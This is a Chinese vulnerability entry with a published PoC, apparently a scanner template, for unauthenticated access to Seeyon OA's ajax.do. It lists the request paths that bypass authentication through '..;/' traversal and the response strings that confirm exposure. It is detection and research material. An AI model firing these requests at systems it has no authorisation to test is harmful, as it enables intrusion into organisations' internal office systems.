漏洞描述
seeyon ajax 未经授权访问
seeyon-ajax-unauthorized-access: seeyon ajax 未经授权访问
PoC代码[已公开]
id: seeyon-ajax-unauthorized-access
info:
name: seeyon ajax 未经授权访问
author: x1n9Qi8
severity: critical
description: seeyon ajax 未经授权访问
reference:
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- https://buaq.net/go-53721.html
rules:
r0:
request:
method: GET
path: /seeyon/thirdpartyController.do.css/..;/ajax.do
expression: response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
r1:
request:
method: GET
path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
expression: response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
expression: r0() && r1()